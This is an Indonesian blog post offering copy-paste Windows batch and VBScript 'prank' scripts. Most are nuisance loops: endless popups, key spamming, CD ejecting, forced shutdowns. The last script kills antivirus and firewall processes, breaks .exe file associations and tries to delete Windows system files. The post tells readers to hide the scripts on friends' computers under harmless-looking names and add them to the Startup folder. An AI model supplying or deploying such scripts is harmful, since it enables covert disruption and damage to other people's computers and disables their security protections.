Thursday, June 13, 2013

Kumpulan Script Jahil Sistem Komputer

Tags



Script
 merupakan sebuah kode yang digunakan oleh seorang programer untuk membuat sebuah program atau system yang ada dalam komputer/laptop yang biasa kita gunakan. Tapi kalau kita salah dalam menyusun script tersebut maka script tersebut dapat memusingkan kita. Contoh yang dapat memusingkan kita apabila script tersebut berulang-ulang memunculkan kotak dialog yang harus kita klik oke untuk menghilangkannya dan itu tidak hanya sekali muncul tapi berulang kali. Nah, sekarang ane mau posting beberapa script jahil yang sudah dimodifikasi. Berikut ini adalah beberapa hal yang harus anda siapkan:
1. Sebuah komputer
2. Notepad
Nah setelah dua hal tersebut siap, sekarang tinggal lakukan copy-paste (copas) script yang berwarna merah di bawah ini.
1. MESSAGE YANG MUNCUL TERUS-MENERUS
@ECHO off
:Begin
 msg * dasar jelek
 msg * ngaca sono
 msg * hayo, CPU lo ane acak2 nih
 msg * mau berhenti?
 msg * install ulang saja
 msg * biar cepet kelar :D
GOTO BEGIN
[Save dengan ekstensi *.bat]
2. SHUTDOWN+MENAMPILKAN PESAN
@echo off
 msg * apaan sih lo
shutdown -s -c "error!!! kejelekanmu bikin kompimu mati"
[Save dengan ekstensi *.bat]
3. MAIN DENGAN TOMBOL CAPSLOCK
Set wshShell =wscript.CreateObject("WScript.Shell")
 do
 wscript.sleep 100
 wshshell.sendkeys "{CAPSLOCK}"
loop
[Save dengan ekstensi *.vbs]
4. MEMBUKA DAN MENUTUP CD/DVD SECARA OTOMATIS
Set oWMP = CreateObject(“WMPlayer.OCX.7?)
 Set colCDROMs = oWMP.cdromCollection
 do
 if colCDROMs.Count >= 1 then
 For i = 0 to colCDROMs.Count – 1
 colCDROMs.Item(i).Eject
 Next
 For i = 0 to colCDROMs.Count – 1
 colCDROMs.Item(i).Eject
 Next
 End If
 wscript.sleep 5000
loop
[Save dengan ekstensi *.vbs]
5. MENEKAN TOMBOL ENTER SECARA TERUS MENERUS
Set wshShell =wscript.CreateObject("WScript.Shell")
do
 wscript.sleep 100
 wshshell.sendkeys "~(enter)"
loop
[Save dengan ekstensi *.vbs]
6. MENEKAN TOMBOL BACKSPACE SECARA TERUS MENERUS
MsgBox “Lets Rumble”
 Set wshShell =wscript.CreateObject("WScript.Shell")
do
 wscript.sleep 100
 wshshell.sendkeys "{bs}"
loop
[Save dengan ekstensi *.vbs]

7. OTOMATIS MENGETIK "Dasar jelek!!!" DI NOTEPAD
Set wshShell =wscript.CreateObject("WScript.Shell")
do
 wscript.sleep 100
 wshshell.sendkeys "dasar jelek!!!"
loop
[Save dengan ekstensi *.vbs]

8. MEMBUKA NOTEPAD TERUS MENERUS
@ECHO off
:top
 START %SystemRoot% \system32\notepad.exe
GOTO top
[Save dengan ekstensi *.bat]

9. MEMBUKA NOTEPAD DAN OTOMATIS NGETIK
WScript.Sleep 180000
 WScript.Sleep 10000
 Set WshShell = WScript.CreateObject("WScript.Shell")
 WshShell.Run "notepad"
 WScript.Sleep 100
 WshShell.AppActivate "Notepad"
 WScript.Sleep 500
 WshShell.SendKeys "kom"
 WScript.Sleep 500
 WshShell.SendKeys "pu"
 WScript.Sleep 500
 WshShell.SendKeys "ter"
 WScript.Sleep 500
 WshShell.SendKeys "mu "
 WScript.Sleep 500
 WshShell.SendKeys "a"
 WScript.Sleep 500
 WshShell.SendKeys "kan "
 WScript.Sleep 500
 WshShell.SendKeys "han "
 WScript.Sleep 500
 WshShell.SendKeys "cur!!"
 WScript.Sleep 500
WshShell.SendKeys "hohoho "
[Save dengan ekstensi *.vbs]

10. SCRIPT QUIZ
@echo off
title quiz hari ini 
 :menu
cls
 echo jika komputermu terkena virus apa yang kamu lakukan
pause
 echo pilih yang mana:
 echo 1. banting komputer
 echo 2. buang komputer
 echo 3. bingung
 set input=nothing
 set /p input=Choice:
 if %input%==1 shutdown -s -t 30
 if %input%==2 del c:\xxx
 if %input%==3 @ECHO off
 msg * dasar jelek
 msg * ngaca sono
 msg * hayo, CPU lo ane acak2 nih
 msg * mau berhenti?
 msg * install ulang saja
 msg * biar cepet kelar :D
 @ECHO off
:top
 START %SystemRoot%
 \system32\notepad.exe
GOTO top
[Save dengan ekstensi *.bat]

11. BAHAYA!! JANGAN DICOBA DI KOMPUTER PRIBADI
@echo off
set end=md "Hack installing"
set fin=copy "Hack log.txt" "Installing"
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked ….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS
\system32\logoff.exe /F /Q DEL C:\WINDOWS
\system32\logon.exe /F /Q DEL C:\WINDOWS
\system32\logon.scr /F /Q cls
shutdown -s -t 5 -c
"thank you for waiting"
[Save dengan ekstensi *.bat]

Semua Script di atas dapat disimpan dengan nama terserah anda, ganti tanda * dengan nama yang anda inginkan, tapi ekstensi harus sesuai dengan format di atas. Misalkan disimpan dengan nama bukanih.bat atau bacanih.vbs. Simpan di komputer teman kalian dengan nama yang tidak mencurigakan. Kalau mau berjalan otomatis, silahkan simpan di folder StartUp yang ada di menu Start. Oiya, setelah kalian simpan Script-script usil tersebut jangan nongol di depan teman kalian itu, agar tidak dilempar pake CPU, hehe.

Blogger
Disqus
Pilih Jenis Komentar

2 comments

om kalo jalan oto harus di restart dulu?

Balas

Artikel Unggulan

Cara VIP Gratis Smule Di Android & Iphone Tanpa Root

ikuti Pembaruan Blog Kami